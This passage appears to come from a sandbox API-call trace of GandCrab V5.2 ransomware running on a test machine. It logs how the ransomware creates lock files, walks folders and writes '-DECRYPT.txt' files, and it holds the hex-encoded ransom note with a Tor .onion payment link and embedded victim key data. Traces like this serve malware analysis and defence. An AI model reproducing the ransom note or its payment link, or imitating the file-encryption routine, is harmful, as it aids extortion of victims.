e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0078.156] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0078.157] CloseHandle (hObject=0x2dc) returned 1 [0078.157] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.157] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.158] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x17, wMilliseconds=0x1d3)) [0078.158] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.158] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.158] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.159] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 123 [0078.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0078.160] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.160] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\") returned 99 [0078.161] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*" [0078.161] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503938 [0078.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.161] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0078.162] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.162] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0078.162] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0078.162] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0078.162] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033" [0078.162] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\" [0078.162] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0078.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0078.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.163] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.164] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.164] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\\\TITWMVJL-DECRYPT.txt") returned 125 [0078.164] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0078.170] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7